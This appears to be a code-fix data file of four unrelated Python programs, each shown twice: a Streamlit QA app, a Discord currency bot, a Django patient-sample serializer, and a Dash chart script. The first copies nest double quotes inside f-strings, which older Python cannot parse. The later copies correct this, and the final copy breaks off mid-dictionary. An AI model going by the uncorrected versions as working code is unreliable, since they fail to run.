import functools from typing import Dict import base64 import streamlit as st # type: ignore import wikipedia # type: ignore from transformers import Pipeline, pipeline # type: ignore from config import config def conditional_decorator(func): @functools.wraps(func) def wrapper(*args, **kwargs): if config["framework"] == "pt": qa = st.cache(func)(*args, **kwargs) else: qa = func(*args, **kwargs) return qa return wrapper @conditional_decorator def get_qa_pipeline() -> Pipeline: qa = pipeline("question-answering", framework=config["framework"]) return qa @conditional_decorator def answer_question(pipeline: Pipeline, question: str, paragraph: str) -> Dict: input = {"question": question, "context": paragraph} return pipeline(input) @conditional_decorator def get_wiki_paragraph(query: str) -> str: results = wikipedia.search(query) try: summary = wikipedia.summary(results[0], sentences=config["NUM_SENT"]) except wikipedia.DisambiguationError as e: ambiguous_terms = e.options return wikipedia.summary(ambiguous_terms[0], sentences=config["NUM_SENT"]) return summary def format_text(paragraph: str, start_idx: int, end_idx: int) -> str: return ( paragraph[:start_idx] + "**" + paragraph[start_idx:end_idx] + "**" + paragraph[end_idx:] ) # + def get_svg(svg: str, style: str = "", wrap: bool = True): """Convert an SVG to a base64-encoded image.""" b64 = base64.b64encode(svg.encode("utf-8")).decode("utf-8") html = f'<img src="data:image/svg+xml;base64,{b64}" style="{style}"/>' return get_html(html) if wrap else html if __name__ == "__main__": """ # cXsquare Lite """ #LOGO_SVG = """<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 900 500 175" width="1500" height="530"><path fill="#09A3D5" d="M64.8 970.6c-11.3-1.3-12.2-16.5-26.7-15.2-7 0-13.6 2.9-13.6 9.4 0 9.7 15 10.6 24.1 13.1 15.4 4.7 30.4 7.9 30.4 24.7 0 21.3-16.7 28.7-38.7 28.7-18.4 0-37.1-6.5-37.1-23.5 0-4.7 4.5-8.4 8.9-8.4 5.5 0 7.5 2.3 9.4 6.2 4.3 7.5 9.1 11.6 21 11.6 7.5 0 15.3-2.9 15.3-9.4 0-9.3-9.5-11.3-19.3-13.6-17.4-4.9-32.3-7.4-34-26.7-1.8-32.9 66.7-34.1 70.6-5.3-.3 5.2-5.2 8.4-10.3 8.4zm81.5-28.8c24.1 0 37.7 20.1 37.7 44.9 0 24.9-13.2 44.9-37.7 44.9-13.6 0-22.1-5.8-28.2-14.7v32.9c0 9.9-3.2 14.7-10.4 14.7-8.8 0-10.4-5.6-10.4-14.7v-95.6c0-7.8 3.3-12.6 10.4-12.6 6.7 0 10.4 5.3 10.4 12.6v2.7c6.8-8.5 14.6-15.1 28.2-15.1zm-5.7 72.8c14.1 0 20.4-13 20.4-28.2 0-14.8-6.4-28.2-20.4-28.2-14.7 0-21.5 12.1-21.5 28.2.1 15.7 6.9 28.2 21.5 28.2zm59.8-49.3c0-17.3 19.9-23.5 39.2-23.5 27.1 0 38.2 7.9 38.2 34v25.2c0 6 3.7 17.9 3.7 21.5 0 5.5-5 8.9-10.4 8.9-6 0-10.4-7-13.6-12.1-8.8 7-18.1 12.1-32.4 12.1-15.8 0-28.2-9.3-28.2-24.7 0-13.6 9.7-21.4 21.5-24.1 0 .1 37.7-8.9 37.7-9 0-11.6-4.1-16.7-16.3-16.7-10.7 0-16.2 2.9-20.4 9.4-3.4 4.9-2.9 7.8-9.4 7.8-5.1 0-9.6-3.6-9.6-8.8zm32.2 51.9c16.5 0 23.5-8.7 23.5-26.1v-3.7c-4.4 1.5-22.4 6-27.3 6.7-5.2 1-10.4 4.9-10.4 11 .2 6.7 7.1 12.1 14.2 12.1zM354 909c23.3 0 48.6 13.9 48.6 36.1 0 5.7-4.3 10.4-9.9 10.4-7.6 0-8.7-4.1-12.1-9.9-5.6-10.3-12.2-17.2-26.7-17.2-22.3-.2-32.3 19-32.3 42.8 0 24 8.3 41.3 31.4 41.3 15.3 0 23.8-8.9 28.2-20.4 1.8-5.3 4.9-10.4 11.6-10.4 5.2 0 10.4 5.3 10.4 11 0 23.5-24 39.7-48.6 39.7-27 0-42.3-11.4-50.6-30.4-4.1-9.1-6.7-18.4-6.7-31.4-.4-36.4 20.8-61.6 56.7-61.6zm133.3 32.8c6 0 9.4 3.9 9.4 9.9 0 2.4-1.9 7.3-2.7 9.9l-28.7 75.4c-6.4 16.4-11.2 27.7-32.9 27.7-10.3 0-19.3-.9-19.3-9.9 0-5.2 3.9-7.8 9.4-7.8 1 0 2.7.5 3.7.5 1.6 0 2.7.5 3.7.5 10.9 0 12.4-11.2 16.3-18.9l-27.7-68.5c-1.6-3.7-2.7-6.2-2.7-8.4 0-6 4.7-10.4 11-10.4 7 0 9.8 5.5 11.6 11.6l18.3 54.3 18.3-50.2c2.7-7.8 3-15.7 12.3-15.7z" /> </svg>""" #LOGO = get_svg(LOGO_SVG, wrap=False, style="max-width: 100%; margin-bottom: 25px") #st.image() st.sidebar.image('CX.png', width=200, use_column_width=True) #st.sidebar.markdown(LOGO, unsafe_allow_html=True) paragraph_slot = st.empty() wiki_query = st.text_area("Enter the Paragraph", "", height = 300) #paragraph_slot.markdown(wiki_query) question = st.text_input("Enter the question", "") if wiki_query: #wiki_para = get_wiki_paragraph(wiki_query) # Execute question against paragraph if question != "": pipeline = get_qa_pipeline() try: answer = answer_question(pipeline, question, wiki_query) start_idx = answer["start"] end_idx = answer["end"] st.success(answer["answer"]) print(f"NUM SENT: {config["NUM_SENT"]}") print(f"FRAMEWORK: {config["framework"]}") print(f"QUESTION: {question}\nRESPONSE: {answer}") except Exception as e: print(e) st.warning("Answer not found") # -
import functools from typing import Dict import base64 import streamlit as st # type: ignore import wikipedia # type: ignore from transformers import Pipeline, pipeline # type: ignore from config import config def conditional_decorator(func): @functools.wraps(func) def wrapper(*args, **kwargs): if config["framework"] == "pt": qa = st.cache(func)(*args, **kwargs) else: qa = func(*args, **kwargs) return qa return wrapper @conditional_decorator def get_qa_pipeline() -> Pipeline: qa = pipeline("question-answering", framework=config["framework"]) return qa @conditional_decorator def answer_question(pipeline: Pipeline, question: str, paragraph: str) -> Dict: input = {"question": question, "context": paragraph} return pipeline(input) @conditional_decorator def get_wiki_paragraph(query: str) -> str: results = wikipedia.search(query) try: summary = wikipedia.summary(results[0], sentences=config["NUM_SENT"]) except wikipedia.DisambiguationError as e: ambiguous_terms = e.options return wikipedia.summary(ambiguous_terms[0], sentences=config["NUM_SENT"]) return summary def format_text(paragraph: str, start_idx: int, end_idx: int) -> str: return ( paragraph[:start_idx] + "**" + paragraph[start_idx:end_idx] + "**" + paragraph[end_idx:] ) # + def get_svg(svg: str, style: str = "", wrap: bool = True): """Convert an SVG to a base64-encoded image.""" b64 = base64.b64encode(svg.encode("utf-8")).decode("utf-8") html = f'<img src="data:image/svg+xml;base64,{b64}" style="{style}"/>' return get_html(html) if wrap else html if __name__ == "__main__": """ # cXsquare Lite """ #LOGO_SVG = """<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 900 500 175" width="1500" height="530"><path fill="#09A3D5" d="M64.8 970.6c-11.3-1.3-12.2-16.5-26.7-15.2-7 0-13.6 2.9-13.6 9.4 0 9.7 15 10.6 24.1 13.1 15.4 4.7 30.4 7.9 30.4 24.7 0 21.3-16.7 28.7-38.7 28.7-18.4 0-37.1-6.5-37.1-23.5 0-4.7 4.5-8.4 8.9-8.4 5.5 0 7.5 2.3 9.4 6.2 4.3 7.5 9.1 11.6 21 11.6 7.5 0 15.3-2.9 15.3-9.4 0-9.3-9.5-11.3-19.3-13.6-17.4-4.9-32.3-7.4-34-26.7-1.8-32.9 66.7-34.1 70.6-5.3-.3 5.2-5.2 8.4-10.3 8.4zm81.5-28.8c24.1 0 37.7 20.1 37.7 44.9 0 24.9-13.2 44.9-37.7 44.9-13.6 0-22.1-5.8-28.2-14.7v32.9c0 9.9-3.2 14.7-10.4 14.7-8.8 0-10.4-5.6-10.4-14.7v-95.6c0-7.8 3.3-12.6 10.4-12.6 6.7 0 10.4 5.3 10.4 12.6v2.7c6.8-8.5 14.6-15.1 28.2-15.1zm-5.7 72.8c14.1 0 20.4-13 20.4-28.2 0-14.8-6.4-28.2-20.4-28.2-14.7 0-21.5 12.1-21.5 28.2.1 15.7 6.9 28.2 21.5 28.2zm59.8-49.3c0-17.3 19.9-23.5 39.2-23.5 27.1 0 38.2 7.9 38.2 34v25.2c0 6 3.7 17.9 3.7 21.5 0 5.5-5 8.9-10.4 8.9-6 0-10.4-7-13.6-12.1-8.8 7-18.1 12.1-32.4 12.1-15.8 0-28.2-9.3-28.2-24.7 0-13.6 9.7-21.4 21.5-24.1 0 .1 37.7-8.9 37.7-9 0-11.6-4.1-16.7-16.3-16.7-10.7 0-16.2 2.9-20.4 9.4-3.4 4.9-2.9 7.8-9.4 7.8-5.1 0-9.6-3.6-9.6-8.8zm32.2 51.9c16.5 0 23.5-8.7 23.5-26.1v-3.7c-4.4 1.5-22.4 6-27.3 6.7-5.2 1-10.4 4.9-10.4 11 .2 6.7 7.1 12.1 14.2 12.1zM354 909c23.3 0 48.6 13.9 48.6 36.1 0 5.7-4.3 10.4-9.9 10.4-7.6 0-8.7-4.1-12.1-9.9-5.6-10.3-12.2-17.2-26.7-17.2-22.3-.2-32.3 19-32.3 42.8 0 24 8.3 41.3 31.4 41.3 15.3 0 23.8-8.9 28.2-20.4 1.8-5.3 4.9-10.4 11.6-10.4 5.2 0 10.4 5.3 10.4 11 0 23.5-24 39.7-48.6 39.7-27 0-42.3-11.4-50.6-30.4-4.1-9.1-6.7-18.4-6.7-31.4-.4-36.4 20.8-61.6 56.7-61.6zm133.3 32.8c6 0 9.4 3.9 9.4 9.9 0 2.4-1.9 7.3-2.7 9.9l-28.7 75.4c-6.4 16.4-11.2 27.7-32.9 27.7-10.3 0-19.3-.9-19.3-9.9 0-5.2 3.9-7.8 9.4-7.8 1 0 2.7.5 3.7.5 1.6 0 2.7.5 3.7.5 10.9 0 12.4-11.2 16.3-18.9l-27.7-68.5c-1.6-3.7-2.7-6.2-2.7-8.4 0-6 4.7-10.4 11-10.4 7 0 9.8 5.5 11.6 11.6l18.3 54.3 18.3-50.2c2.7-7.8 3-15.7 12.3-15.7z" /> </svg>""" #LOGO = get_svg(LOGO_SVG, wrap=False, style="max-width: 100%; margin-bottom: 25px") #st.image() st.sidebar.image('CX.png', width=200, use_column_width=True) #st.sidebar.markdown(LOGO, unsafe_allow_html=True) paragraph_slot = st.empty() wiki_query = st.text_area("Enter the Paragraph", "", height = 300) #paragraph_slot.markdown(wiki_query) question = st.text_input("Enter the question", "") if wiki_query: #wiki_para = get_wiki_paragraph(wiki_query) # Execute question against paragraph if question != "": pipeline = get_qa_pipeline() try: answer = answer_question(pipeline, question, wiki_query) start_idx = answer["start"] end_idx = answer["end"] st.success(answer["answer"]) print(f"NUM SENT: {config['NUM_SENT']}") print(f"FRAMEWORK: {config['framework']}") print(f"QUESTION: {question}\nRESPONSE: {answer}") except Exception as e: print(e) st.warning("Answer not found") # -
import discord import json import http3 class currency(): async def currencyConverter(self, message): messageArray = message.content.split(" ") if(not len(message.content.split(" ")) == 3): await message.channel.send("Incorrect number of parameters! Format currency requests as `>currency <amount> <currency code>`") return try: int(message.content.split(" ")[1]) except: await message.channel.send(f"{message.content.split(" ")[1]} is not a valid number!") return if(message.content.split(" ")[2].upper() not in ["CAD", "HKD","ISK","PHP","DKK","HUF","CZK","AUD","RON","SEK","IDR","INR","BRL","RUB","HRK","JPY","THB","CHF","EUR","SGD","PLN","BGN","TRY","CNY","NOK","NZD","ZAR","USD","MXN","ILS","GBP","KRW","MYR"]): await message.channel.send(f"{message.content.split(" ")[2]} is an unknown currency type!") return await message.channel.send("Making GET request, please hold...") curStats = await self.makeTheRequest(message.content.split(" ")) USD = round(curStats["rates"]["USD"] * int(messageArray[1]), 2) AUD = round(curStats["rates"]["AUD"] * int(messageArray[1]), 2) ZAR = round(curStats["rates"]["ZAR"] * int(messageArray[1]), 2) BGN = round(curStats["rates"]["BGN"] * int(messageArray[1]), 2) PLN = round(curStats["rates"]["PLN"] * int(messageArray[1]), 2) NZD = round(curStats["rates"]["NZD"] * int(messageArray[1]), 2) GBP = round(curStats["rates"]["GBP"] * int(messageArray[1]), 2) EUR = int(message.content.split(" ")[1]) if ("EUR" in curStats["rates"]): EUR = round(curStats["rates"]["EUR"] * int(messageArray[1]), 2) sendMessage = f"```py\nConverting {message.content.split(" ")[1]} {message.content.split(" ")[2].upper()}:\n" sendMessage += f"United States Dollar: {USD}\n" sendMessage += f"Australian Dollar: {AUD}\n" sendMessage += f"South African Rand: {ZAR}\n" sendMessage += f"Bulgarian Lev: {BGN}\n" sendMessage += f"Polish złoty: {PLN}\n" sendMessage += f"New Zealand Dollar: {NZD}\n" sendMessage += f"Euro: {EUR}\n" sendMessage += f"Great Britain Pound: {GBP}\n" sendMessage += "```" await message.channel.send(sendMessage) async def makeTheRequest(self, infoList): client = http3.AsyncClient() response = await client.get(f"https://api.exchangeratesapi.io/latest?base={infoList[2].upper()}") responseData = response.text responseData = json.loads(responseData) return responseData
import discord import json import http3 class currency(): async def currencyConverter(self, message): messageArray = message.content.split(" ") if(not len(message.content.split(" ")) == 3): await message.channel.send("Incorrect number of parameters! Format currency requests as `>currency <amount> <currency code>`") return try: int(message.content.split(" ")[1]) except: await message.channel.send(f"{message.content.split(' ')[1]} is not a valid number!") return if(message.content.split(" ")[2].upper() not in ["CAD", "HKD","ISK","PHP","DKK","HUF","CZK","AUD","RON","SEK","IDR","INR","BRL","RUB","HRK","JPY","THB","CHF","EUR","SGD","PLN","BGN","TRY","CNY","NOK","NZD","ZAR","USD","MXN","ILS","GBP","KRW","MYR"]): await message.channel.send(f"{message.content.split(' ')[2]} is an unknown currency type!") return await message.channel.send("Making GET request, please hold...") curStats = await self.makeTheRequest(message.content.split(" ")) USD = round(curStats["rates"]["USD"] * int(messageArray[1]), 2) AUD = round(curStats["rates"]["AUD"] * int(messageArray[1]), 2) ZAR = round(curStats["rates"]["ZAR"] * int(messageArray[1]), 2) BGN = round(curStats["rates"]["BGN"] * int(messageArray[1]), 2) PLN = round(curStats["rates"]["PLN"] * int(messageArray[1]), 2) NZD = round(curStats["rates"]["NZD"] * int(messageArray[1]), 2) GBP = round(curStats["rates"]["GBP"] * int(messageArray[1]), 2) EUR = int(message.content.split(" ")[1]) if ("EUR" in curStats["rates"]): EUR = round(curStats["rates"]["EUR"] * int(messageArray[1]), 2) sendMessage = f"```py\nConverting {message.content.split(' ')[1]} {message.content.split(' ')[2].upper()}:\n" sendMessage += f"United States Dollar: {USD}\n" sendMessage += f"Australian Dollar: {AUD}\n" sendMessage += f"South African Rand: {ZAR}\n" sendMessage += f"Bulgarian Lev: {BGN}\n" sendMessage += f"Polish złoty: {PLN}\n" sendMessage += f"New Zealand Dollar: {NZD}\n" sendMessage += f"Euro: {EUR}\n" sendMessage += f"Great Britain Pound: {GBP}\n" sendMessage += "```" await message.channel.send(sendMessage) async def makeTheRequest(self, infoList): client = http3.AsyncClient() response = await client.get(f"https://api.exchangeratesapi.io/latest?base={infoList[2].upper()}") responseData = response.text responseData = json.loads(responseData) return responseData
from django.utils import timezone from rest_framework import serializers from rest_framework.exceptions import ValidationError from care.facility.api.serializers import TIMESTAMP_FIELDS from care.facility.api.serializers.facility import FacilityBasicInfoSerializer from care.facility.models import PatientConsultation, PatientRegistration, Facility from care.facility.models.patient_sample import SAMPLE_TYPE_CHOICES, PatientSample, PatientSampleFlow from care.utils.serializer.external_id_field import ExternalIdSerializerField from config.serializers import ChoiceField class PatientSampleFlowSerializer(serializers.ModelSerializer): status = ChoiceField(choices=PatientSample.SAMPLE_TEST_FLOW_CHOICES, required=False) class Meta: model = PatientSampleFlow fields = "__all__" class PatientSampleSerializer(serializers.ModelSerializer): id = serializers.UUIDField(source="external_id", read_only=True) patient_name = serializers.CharField(read_only=True, source="patient.name") patient_has_sari = serializers.BooleanField(read_only=True, source="patient.has_SARI") patient_has_confirmed_contact = serializers.BooleanField( read_only=True, source="patient.contact_with_confirmed_carrier" ) patient_has_suspected_contact = serializers.BooleanField( read_only=True, source="patient.contact_with_suspected_carrier" ) patient_travel_history = serializers.CharField(read_only=True, source="patient.countries_travelled") facility = ExternalIdSerializerField(read_only=True, source="consultation.facility") facility_object = FacilityBasicInfoSerializer(source="consultation.facility", read_only=True) sample_type = ChoiceField(choices=SAMPLE_TYPE_CHOICES, required=False) status = ChoiceField(choices=PatientSample.SAMPLE_TEST_FLOW_CHOICES, required=False) result = ChoiceField(choices=PatientSample.SAMPLE_TEST_RESULT_CHOICES, required=False) icmr_category = ChoiceField(choices=PatientSample.PATIENT_ICMR_CATEGORY, required=False) patient = ExternalIdSerializerField(required=False, queryset=PatientRegistration.objects.all()) consultation = ExternalIdSerializerField(required=False, queryset=PatientConsultation.objects.all()) date_of_sample = serializers.DateTimeField(required=False) date_of_result = serializers.DateTimeField(required=False) notes = serializers.CharField(required=False, allow_blank=True) testing_facility = ExternalIdSerializerField(queryset=Facility.objects.all(), required=False) testing_facility_object = FacilityBasicInfoSerializer(source="testing_facility", read_only=True) class Meta: model = PatientSample read_only_fields = ( "id", "facility", ) exclude = TIMESTAMP_FIELDS + ("external_id",) def create(self, validated_data): validated_data.pop("status", None) validated_data.pop("result", None) return super(PatientSampleSerializer, self).create(validated_data) class PatientSamplePatchSerializer(PatientSampleSerializer): notes = serializers.CharField(required=False) def update(self, instance, validated_data): try: is_completed = validated_data.get("result") in [1, 2] new_status = validated_data.get( "status", PatientSample.SAMPLE_TEST_FLOW_MAP["COMPLETED"] if is_completed else None ) choice = PatientSample.SAMPLE_TEST_FLOW_CHOICES[new_status - 1][1] if is_completed: validated_data["status"] = PatientSample.SAMPLE_TEST_FLOW_MAP["COMPLETED"] except KeyError: raise ValidationError({"status": ["is required"]}) valid_choices = PatientSample.SAMPLE_FLOW_RULES[PatientSample.SAMPLE_TEST_FLOW_CHOICES[instance.status - 1][1]] if choice not in valid_choices: raise ValidationError({"status": [f"Next valid choices are: {", ".join(valid_choices)}"]}) if choice != "COMPLETED" and validated_data.get("result"): raise ValidationError({"result": [f"Result can't be updated unless test is complete"]}) if choice == "COMPLETED" and not validated_data.get("result"): raise ValidationError({"result": [f"is required as the test is complete"]}) if validated_data.get("result") is None and validated_data.get("date_of_result") is not None: raise ValidationError({"date_of_result": [f"cannot be provided without result"]}) if not instance.date_of_sample and validated_data.get("status") in [ PatientSample.SAMPLE_TEST_FLOW_MAP[key] for key in ["SENT_TO_COLLECTON_CENTRE", "RECEIVED_AND_FORWARED", "RECEIVED_AT_LAB"] ]: validated_data["date_of_sample"] = timezone.now() elif validated_data.get("status") == PatientSample.SAMPLE_TEST_FLOW_MAP["REQUEST_SUBMITTED"]: validated_data["result"] = PatientSample.SAMPLE_TEST_RESULT_MAP["AWAITING"] elif validated_data.get("result") is not None and validated_data.get("date_of_result") is None: validated_data["date_of_result"] = timezone.now() return super().update(instance, validated_data) class PatientSampleDetailSerializer(PatientSampleSerializer): flow = serializers.ListSerializer(child=PatientSampleFlowSerializer()) facility_object = FacilityBasicInfoSerializer(source="consultation.facility")
from django.utils import timezone from rest_framework import serializers from rest_framework.exceptions import ValidationError from care.facility.api.serializers import TIMESTAMP_FIELDS from care.facility.api.serializers.facility import FacilityBasicInfoSerializer from care.facility.models import PatientConsultation, PatientRegistration, Facility from care.facility.models.patient_sample import SAMPLE_TYPE_CHOICES, PatientSample, PatientSampleFlow from care.utils.serializer.external_id_field import ExternalIdSerializerField from config.serializers import ChoiceField class PatientSampleFlowSerializer(serializers.ModelSerializer): status = ChoiceField(choices=PatientSample.SAMPLE_TEST_FLOW_CHOICES, required=False) class Meta: model = PatientSampleFlow fields = "__all__" class PatientSampleSerializer(serializers.ModelSerializer): id = serializers.UUIDField(source="external_id", read_only=True) patient_name = serializers.CharField(read_only=True, source="patient.name") patient_has_sari = serializers.BooleanField(read_only=True, source="patient.has_SARI") patient_has_confirmed_contact = serializers.BooleanField( read_only=True, source="patient.contact_with_confirmed_carrier" ) patient_has_suspected_contact = serializers.BooleanField( read_only=True, source="patient.contact_with_suspected_carrier" ) patient_travel_history = serializers.CharField(read_only=True, source="patient.countries_travelled") facility = ExternalIdSerializerField(read_only=True, source="consultation.facility") facility_object = FacilityBasicInfoSerializer(source="consultation.facility", read_only=True) sample_type = ChoiceField(choices=SAMPLE_TYPE_CHOICES, required=False) status = ChoiceField(choices=PatientSample.SAMPLE_TEST_FLOW_CHOICES, required=False) result = ChoiceField(choices=PatientSample.SAMPLE_TEST_RESULT_CHOICES, required=False) icmr_category = ChoiceField(choices=PatientSample.PATIENT_ICMR_CATEGORY, required=False) patient = ExternalIdSerializerField(required=False, queryset=PatientRegistration.objects.all()) consultation = ExternalIdSerializerField(required=False, queryset=PatientConsultation.objects.all()) date_of_sample = serializers.DateTimeField(required=False) date_of_result = serializers.DateTimeField(required=False) notes = serializers.CharField(required=False, allow_blank=True) testing_facility = ExternalIdSerializerField(queryset=Facility.objects.all(), required=False) testing_facility_object = FacilityBasicInfoSerializer(source="testing_facility", read_only=True) class Meta: model = PatientSample read_only_fields = ( "id", "facility", ) exclude = TIMESTAMP_FIELDS + ("external_id",) def create(self, validated_data): validated_data.pop("status", None) validated_data.pop("result", None) return super(PatientSampleSerializer, self).create(validated_data) class PatientSamplePatchSerializer(PatientSampleSerializer): notes = serializers.CharField(required=False) def update(self, instance, validated_data): try: is_completed = validated_data.get("result") in [1, 2] new_status = validated_data.get( "status", PatientSample.SAMPLE_TEST_FLOW_MAP["COMPLETED"] if is_completed else None ) choice = PatientSample.SAMPLE_TEST_FLOW_CHOICES[new_status - 1][1] if is_completed: validated_data["status"] = PatientSample.SAMPLE_TEST_FLOW_MAP["COMPLETED"] except KeyError: raise ValidationError({"status": ["is required"]}) valid_choices = PatientSample.SAMPLE_FLOW_RULES[PatientSample.SAMPLE_TEST_FLOW_CHOICES[instance.status - 1][1]] if choice not in valid_choices: raise ValidationError({"status": [f"Next valid choices are: {', '.join(valid_choices)}"]}) if choice != "COMPLETED" and validated_data.get("result"): raise ValidationError({"result": [f"Result can't be updated unless test is complete"]}) if choice == "COMPLETED" and not validated_data.get("result"): raise ValidationError({"result": [f"is required as the test is complete"]}) if validated_data.get("result") is None and validated_data.get("date_of_result") is not None: raise ValidationError({"date_of_result": [f"cannot be provided without result"]}) if not instance.date_of_sample and validated_data.get("status") in [ PatientSample.SAMPLE_TEST_FLOW_MAP[key] for key in ["SENT_TO_COLLECTON_CENTRE", "RECEIVED_AND_FORWARED", "RECEIVED_AT_LAB"] ]: validated_data["date_of_sample"] = timezone.now() elif validated_data.get("status") == PatientSample.SAMPLE_TEST_FLOW_MAP["REQUEST_SUBMITTED"]: validated_data["result"] = PatientSample.SAMPLE_TEST_RESULT_MAP["AWAITING"] elif validated_data.get("result") is not None and validated_data.get("date_of_result") is None: validated_data["date_of_result"] = timezone.now() return super().update(instance, validated_data) class PatientSampleDetailSerializer(PatientSampleSerializer): flow = serializers.ListSerializer(child=PatientSampleFlowSerializer()) facility_object = FacilityBasicInfoSerializer(source="consultation.facility")
# -*- coding: utf-8 -*- import dash import dash_core_components as dcc import dash_html_components as html import plotly.graph_objs as go import datetime from datetime import timedelta app = dash.Dash() x_data = ['DSL', 'Gas', 'Electricty'] start = go.Bar( x=[datetime.datetime(y, m, d) for (y, m, d) in [(2015, 10, 1), (2015, 10, 2), (2015, 10, 3)]], y=x_data, marker=dict( color='rgba(1,1,1, 0.0)', ) ) end = go.Bar( x=[datetime.datetime(y, m, d) for (y, m, d) in [(2015, 12, 1), (2015, 12, 2), (2015, 12, 3)]], y=x_data, marker=dict( color='rgba(55, 128, 191, 0.7)', line=dict( color='rgba(55, 128, 191, 1.0)', width=2, ) ) ) x_data1 = ['DSL1', 'Gas1', 'Electricty1'] start1 = go.Bar( x=[20, 40, 60], y=x_data1, marker=dict( color='rgba(1,1,1, 0.0)', ) ) end1 = go.Bar( x=[100, 200, 300], y=x_data1, marker=dict( color='rgba(55, 128, 191, 0.7)', line=dict( color='rgba(55, 128, 191, 1.0)', width=2, ) ) ) def build_data(contract_name, stream): # one stream only data = [] #t0 = datetime.datetime.now() + datetime.timedelta(year=-1) month_list = sorted([z['month'] for z in stream['monthList']]) month_list = [datetime.datetime.strptime(month, '%Y-%m-%d') for month in month_list] print(month_list) min_month = min(month_list) max_month = max(month_list) #month_list = [(month - min_month).days for month in month_list] #min_month = min(month_list) #max_month = max(month_list) length = len(month_list) print("////////////////////") print(month_list) print((min_month, "===", max_month)) print("////////////////////") #for i in range(0, length-1): #start = month_list[i] #end = month_list[i+1] start = go.Bar(y=[min_month, min_month + datetime.timedelta(days=1)], x=[contract_name, 'x'], orientation='h', marker=dict(color='rgba(1,1,1, 0.0)')) end = go.Bar(y=[max_month, max_month + datetime.timedelta(days=1)], x=[contract_name, 'y'], orientation='h', marker=dict(color='rgba(55, 128, 191, 0.7)', line=dict( color='rgba(55, 128, 191, 1.0)', width=2,))) data.append(start) data.append(end) return data def plot_bar(data): app.layout = html.Div(children=[html.H1(children='CM PT'), html.Div(children='''History.'''), dcc.Graph( figure=go.Figure( data = data, layout=go.Layout(title='Streams', showlegend=False, barmode='stack', margin=go.Margin(l=200, r=0, t=40, b=20))), style={'height': 300}, id='my-graph') ]) example_stream={'status': 'active', 'numberOfTransactions': 2, 'bookingTypes': [''], 'amountPerMonth': 3987.5, 'coeffOfVariation': 0.0, 'firstPayment': '2017-04-27', 'confidence': 1.0, 'groupKey': '', 'accountTypes': ['Giro account'], 'transactionsPerMonth': 1.0, 'monthList': [{'transactions': [{'partnerName': '', 'uid': 99999999, 'amount': 3987.5, 'bookingType': '', 'subclf': '1_1', 'bookingDate': '27-04-2017', 'partnerAccountIBAN': ''}], 'month': '2017-04-01'}, {'transactions': [{'partnerName': '', 'uid': 111.0, 'amount': 3987.5, 'bookingType': '', 'subclf': '1_1', 'bookingDate': '29-05-2017', 'partnerAccountIBAN': ''}], 'month': '2017-05-01'}], 'partnerName': '', 'highestAmount': 3987.5, 'numberOfTransactionPerMonthWithTransaction': 1.0, 'overallAvailableMonths': 2, 'windowSize': '1M', 'lastPayment': '2017-05-29', 'nrMonthsWithTransaction': 2, 'numberOfMonths': 2, 'groupKeyType': 'partnerName', 'lowestAmount': 3987.5, 'nrMonthsWithoutTransaction': 0, 'amount': 3987.5, 'meanAmount': 3987.5, 'medianAmount': 3987.5, 'subclasses': ['1_1', '1_2'], 'missedMonthsSinceLatestTransaction': 0} if __name__ == '__main__': data = build_data('S', example_stream) plot_bar(data) print(data) app.run_server(debug=True)
# -*- coding: utf-8 -*- import dash import dash_core_components as dcc import dash_html_components as html import plotly.graph_objs as go import datetime from datetime import timedelta app = dash.Dash() x_data = ['DSL', 'Gas', 'Electricty'] start = go.Bar( x=[datetime.datetime(y, m, d) for (y, m, d) in [(2015, 10, 1), (2015, 10, 2), (2015, 10, 3)]], y=x_data, marker=dict( color='rgba(1,1,1, 0.0)', ) ) end = go.Bar( x=[datetime.datetime(y, m, d) for (y, m, d) in [(2015, 12, 1), (2015, 12, 2), (2015, 12, 3)]], y=x_data, marker=dict( color='rgba(55, 128, 191, 0.7)', line=dict( color='rgba(55, 128, 191, 1.0)', width=2, ) ) ) x_data1 = ['DSL1', 'Gas1', 'Electricty1'] start1 = go.Bar( x=[20, 40, 60], y=x_data1, marker=dict( color='rgba(1,1,1, 0.0)', ) ) end1 = go.Bar( x=[100, 200, 300], y=x_data1, marker=dict( color='rgba(55, 128, 191, 0.7)', line=dict( color='rgba(55, 128, 191, 1.0)', width=2, ) ) ) def build_data(contract_name, stream): # one stream only data = [] #t0 = datetime.datetime.now() + datetime.timedelta(year=-1) month_list = sorted([z['month'] for z in stream['monthList']]) month_list = [datetime.datetime.strptime(month, '%Y-%m-%d') for month in month_list] print(month_list) min_month = min(month_list) max_month = max(month_list) #month_list = [(month - min_month).days for month in month_list] #min_month = min(month_list) #max_month = max(month_list) length = len(month_list) print("////////////////////") print(month_list) print((min_month, "===", max_month)) print("////////////////////") #for i in range(0, length-1): #start = month_list[i] #end = month_list[i+1] start = go.Bar(y=[min_month, min_month + datetime.timedelta(days=1)], x=[contract_name, 'x'], orientation='h', marker=dict(color='rgba(1,1,1, 0.0)')) end = go.Bar(y=[max_month, max_month + datetime.timedelta(days=1)], x=[contract_name, 'y'], orientation='h', marker=dict(color='rgba(55, 128, 191, 0.7)', line=dict( color='rgba(55, 128, 191, 1.0)', width=2,))) data.append(start) data.append(end) return data def plot_bar(data): app.layout = html.Div(children=[html.H1(children='CM PT'), html.Div(children='''History.'''), dcc.Graph( figure=go.Figure( data = data, layout=go.Layout(title='Streams', showlegend=False, barmode='stack', margin=go.Margin(l=200, r=0, t=40, b=20))), style={'height': 300}, id='my-graph') ]) example_stream={'status': 'active', 'numberOfTransactions': 2, 'bookingTypes': [''], 'amountPerMonth': 3987.5, 'coeffOfVariation': 0.0, 'firstPayment': '2017-04-27', 'confidence': 1.0, 'groupKey': '', 'accountTypes': ['Giro account'], 'transactionsPerMonth': 1.0, 'monthList': [{'transactions': [{'partnerName': '', 'uid': 99999999, 'amount': 3987.5, 'bookingType': '', 'subclf': '1_1', 'bookingDate': '27-04-2017', 'partnerAccountIBAN': ''}], 'month': '2017-04-01'}, {'transactions': [{'partnerName': '', 'uid': 111.0, 'amount': 3987.5, 'bookingType': '', 'subclf': '1_1', 'bookingDate': '29-05-2017', 'partnerAccountIBAN': ''}], 'month': '2017-05-01'}], 'partnerName': '', 'highestAmount': 3987.5, 'numberOfTransactionPerMonthWithTransaction': 1.0, 'overallAvailableMonths': 2, 'windowSize': '1M', 'lastPayment': '2017-05-29', 'nrMonthsWithTransaction': 2, 'numberOfMonths': 2, 'groupKeyType': 'partnerName', 'lowestAmount': 3987.5, 'nrMonthsWithoutTransaction': 0, 'amount': 3987.5, 'meanAmount': 3987.5, 'medianAmount': 3987.5, 